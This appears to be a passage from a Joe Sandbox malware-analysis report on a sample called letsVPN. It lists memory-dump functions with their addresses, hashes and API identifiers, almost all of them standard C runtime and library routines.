                                                                                                                                                                                                    • Opcode ID: 80daba6271380592d10127e8d2acf46dd4fbfe58f21230b3219736ccd9c5575b
                                                                                                                                                                                                    • Instruction ID: c15a570fe7201781e323b6364401935b99c4dd36f3ea7e37dff944e6a4b1e7eb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80daba6271380592d10127e8d2acf46dd4fbfe58f21230b3219736ccd9c5575b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D21745B50D6C98BF2E34A5809667CC2F95A76BB54F4DD04BE740872C3ED0A5A0D8712
                                                                                                                                                                                                    Function 0000000180027F26 Relevance: .1, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 4b0925da22f3167fc4518d6fdabeb080d6bf6fcfa7919c9c89adc7a2d1d6a2d6
                                                                                                                                                                                                    • Instruction ID: 33691712f6f438f05009084883b153e3ae8e11c3ff6b3d0799d863b55aa79c95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b0925da22f3167fc4518d6fdabeb080d6bf6fcfa7919c9c89adc7a2d1d6a2d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11A66750DAC98BF2E34A180D663CC2FA1B76BB54F4EC04BE740872C3DD0A5A1D8712
                                                                                                                                                                                                    Function 000000018002A2C8 Relevance: .0, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 94ce35469f95757fdce6de76dd4687a94f659296d729896dedd45fa02a776150
                                                                                                                                                                                                    • Instruction ID: e652e8f7343141416138e8fd5fbe918c0167504c322538acec67b7bd2813ee44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94ce35469f95757fdce6de76dd4687a94f659296d729896dedd45fa02a776150
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B111725754DAC54BF3A34A28096638C2F91A76BB54F4EC04BE780C66C3DD4A5D0D8712
                                                                                                                                                                                                    Function 000000018002A010 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: e734103faaab4c2e7e967968c796f9210fb863abb67667c3ab874bdf9ae2f22a
                                                                                                                                                                                                    • Instruction ID: 1a330b6eb6cb7331cca00eb7876e859d0fc3c57f195b7e97521f92801f8049fe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e734103faaab4c2e7e967968c796f9210fb863abb67667c3ab874bdf9ae2f22a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CE0505B50EBD94BF7A34524089A3881FA0B75B754F4E808B9B40C72C3DD09190D4712
                                                                                                                                                                                                    Function 000000018002A2E0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ed367d4789c2ede9959900627dd84fbe325cd282f4f65e90dd2a71c5588b27cd
                                                                                                                                                                                                    • Instruction ID: cdff8aac21e39bdffb5c0a1424c16b876a6f698e69538227efd5b67c7d76ee7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed367d4789c2ede9959900627dd84fbe325cd282f4f65e90dd2a71c5588b27cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40A0110A00EA808AE0A200080A2A3882BC2AB2BA28E0A800E8B008A282C80308080302
                                                                                                                                                                                                    Function 0000000180017175 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 483fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleFileWrite_errno$ByteCharModeMultiWide_getptd_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64_nolockisleadbyte
                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                    • API String ID: 3520455412-4171548499
                                                                                                                                                                                                    • Opcode ID: a1d51b49281c44d7484275276e233aa3cb53cada12c7ba4be642932869736177
                                                                                                                                                                                                    • Instruction ID: b46e96f5a14dbaed61057a6421e814b0e27d8fd4eeb1fb219b01a6310670cfc6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d51b49281c44d7484275276e233aa3cb53cada12c7ba4be642932869736177
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53229232304E4986E7A28F69E4843EEA7B1F7897D4F548115FA4E837A6DF78C649C700
                                                                                                                                                                                                    Function 0000000180010B4C Relevance: 18.1, APIs: 12, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                    • Opcode ID: ee1d19fea0bae8f54c4ecce85b8f7f5e9882ddbb557b93a21096a6cdb9f4d0ec
                                                                                                                                                                                                    • Instruction ID: 540f112b3376753d76ebebbc2b080d9ee08ccc9e8b3e512eb475de5d71797ad2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee1d19fea0bae8f54c4ecce85b8f7f5e9882ddbb557b93a21096a6cdb9f4d0ec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24313035601E8C85FFD7DB51E8993E42362BB5D7D4F18C216E969066A2CFE8878C8740
                                                                                                                                                                                                    Function 00000001800069AC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionThrow$std::system_error::system_error
                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                    • API String ID: 1466986864-1866435925
                                                                                                                                                                                                    • Opcode ID: f218849abe9b38e94ac4d2c630ac8f88cbc5ff5d085dbd21e556318f958075ca
                                                                                                                                                                                                    • Instruction ID: 19bd8bc911f40175b97b9093b97bc396dab6228c1c64309ee3559f4edbb63a7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f218849abe9b38e94ac4d2c630ac8f88cbc5ff5d085dbd21e556318f958075ca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8417A72B04B58C9FB92DB64E9413EC33A5F789788F94C025EA4917A69EF34C64AC340
                                                                                                                                                                                                    Function 0000000180001CF8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: `=e$bad cast
                                                                                                                                                                                                    • API String ID: 669907958-2264749266
                                                                                                                                                                                                    • Opcode ID: 8b29f3d75597b23acd27b8da13887c9b4e7b9201f86d751601d085f138d50bc9
                                                                                                                                                                                                    • Instruction ID: 8ca33a061464bba5c45e6683e1bf953228fea4ddb1bd0cbe83332f27337d7377
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b29f3d75597b23acd27b8da13887c9b4e7b9201f86d751601d085f138d50bc9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031A036204A49C5EBE3DB25E8403E97361F78CBE1F548222FA69076E9DF74C64AC700
                                                                                                                                                                                                    Function 000000018001A20B Relevance: 16.6, APIs: 11, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast__freetlocinfo_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2902648625-0
                                                                                                                                                                                                    • Opcode ID: 4f86707f042f0f70e309f282cd80fb6350a7b1e5d563aaadb29fb266c30f3f84
                                                                                                                                                                                                    • Instruction ID: d4fd448629bea0944a9ce6419166f042996569ef96d57f7d0e9fc5dd1e168700
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f86707f042f0f70e309f282cd80fb6350a7b1e5d563aaadb29fb266c30f3f84
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4312931706D8C45FFDBABA580513FC1252AB8EBC0F488026F91A076C6CE668B4C8711
                                                                                                                                                                                                    Function 0000000180012CBE Relevance: 16.5, APIs: 11, Instructions: 38COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharMultiWidefree$CommandFreeHeapInitializeLineProcess__crt__setargv_calloc_crt_cinit_heap_init_ioinit_ioterm_mtinit_mtterm_setenvp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3777929205-0
                                                                                                                                                                                                    • Opcode ID: 538f82da0c57203f2e42a4aa579ca18242c83c978de81da7870a1bb0280db99e
                                                                                                                                                                                                    • Instruction ID: 955846853c1aca4bb0351aecbeffa36252468ecdafedbdcff9b0203ffdb1139c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 538f82da0c57203f2e42a4aa579ca18242c83c978de81da7870a1bb0280db99e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F013730209E0E82F7DBB3B1A9463ED12A4AF0D3D0F11C520B909801D3FE69C7AC43A6
                                                                                                                                                                                                    Function 0000000180001E28 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctypestd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 2884461038-3145022300
                                                                                                                                                                                                    • Opcode ID: 4a6e3db9f86bfa185145943c2ba9ce5d8d32fd3de24b8126471decbf8e0ce72a
                                                                                                                                                                                                    • Instruction ID: bba0dda19b7f5636e58bd831b7008e13427c54b61a4d0a3d5926d346d7e8960c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a6e3db9f86bfa185145943c2ba9ce5d8d32fd3de24b8126471decbf8e0ce72a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB318F32604A49C5EBA2DB15E4403E97361F798BE0F58C222FA6E476E5DF38C649C700
                                                                                                                                                                                                    Function 00000001800247C7 Relevance: 13.7, APIs: 9, Instructions: 183fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd_read_nolock$File__create_set_osfhnd_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 854651379-0
                                                                                                                                                                                                    • Opcode ID: e3146d647d6935da85357ae33a8d5690b59f691699a25a2c77bb634041758d8b
                                                                                                                                                                                                    • Instruction ID: 0fe23ee3c5093393091e27a1d6bc270ec4a231297c21357290c6c28af45ec14f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3146d647d6935da85357ae33a8d5690b59f691699a25a2c77bb634041758d8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D871F633B24A4C85FBA7CB68C4943EC2760A749BE8F14D215EE6A5B7E5CE78C509C701
                                                                                                                                                                                                    Function 0000000180013FE3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 1037122555-1018135373
                                                                                                                                                                                                    • Opcode ID: 962e7cb3e89cea5562c49c3031c35959d4cae53a636a84b1a964e2033da49479
                                                                                                                                                                                                    • Instruction ID: 1ea455a6890135db2acfd04d796b689a85a8afa8928af47ad612c471f8f71858
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 962e7cb3e89cea5562c49c3031c35959d4cae53a636a84b1a964e2033da49479
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C21FF37204A4886E7B2DF16E04079E77A0F78DBA9F048215EF9907795CF39D58ACB01
                                                                                                                                                                                                    Function 00000001800116CF Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProcstd::exception::exception
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 1703389215-340411864
                                                                                                                                                                                                    • Opcode ID: d9a9fe5c5a4631ccb24c9dd95b72265727b306f07ef7fc7b131185eeea6a4b29
                                                                                                                                                                                                    • Instruction ID: 40ddd88acbf1a00d0738532e652d1d6ecf7fc29d0571a400658d68e487efbca5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9a9fe5c5a4631ccb24c9dd95b72265727b306f07ef7fc7b131185eeea6a4b29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4017C74605F488AFBDBDB65B8553E423A1AB4DB81F448025ED1E423A1EF3C868DC300
                                                                                                                                                                                                    Function 000000018002489F Relevance: 12.2, APIs: 8, Instructions: 151fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lseeki64_nolock$_read_nolock$CloseErrorFileHandleLast__create_close_nolock_dosmaperr_errno_free_osfhnd_get_osfhandle_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1845299851-0
                                                                                                                                                                                                    • Opcode ID: ac6e27d9cca6aa17dc29c3c82d3b4841349e8a2d996987247107110dfd4e7de9
                                                                                                                                                                                                    • Instruction ID: f5e863b8e90898d0d1dd555edfc154885d718558064089736708c50343d3e3f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac6e27d9cca6aa17dc29c3c82d3b4841349e8a2d996987247107110dfd4e7de9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51510633B24A4C46FBA7CB68C4943EC2760A749BA8F14C215FA6A5B7D5CE38C949C701
                                                                                                                                                                                                    Function 00000001800189A9 Relevance: 12.1, APIs: 8, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle_set_osfhnd_unlock_fhandle$_errno_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 455515276-0
                                                                                                                                                                                                    • Opcode ID: fc89ad88c8ebd5d190681edaa4108cb78eab84b12ccd4b9125013d2badd4f79d
                                                                                                                                                                                                    • Instruction ID: ee76e099d312f5228527cdb841e2a866b73033335cbf8fc842a488cc13d2f90e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc89ad88c8ebd5d190681edaa4108cb78eab84b12ccd4b9125013d2badd4f79d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C951E073228AC882EB92CB15E4853DE7B61F789BD0F548117EE89077A5CF78C659C701
                                                                                                                                                                                                    Function 0000000180017917 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_getbuf_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2955468974-0
                                                                                                                                                                                                    • Opcode ID: 8d20d4754d52cfa00c1c0ce0ebacd4e0ce1dc05db65ae304bd05ef0356ae94f9
                                                                                                                                                                                                    • Instruction ID: 216c952d2c14e2f408fe60a45fa4d95ab858a39eff18c99c1178ca57ab0a0d57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d20d4754d52cfa00c1c0ce0ebacd4e0ce1dc05db65ae304bd05ef0356ae94f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631C632B00A4846EBA78B25D2453EC27B0FB5D7D4F548605EB5E436D2CF24C7AE8740
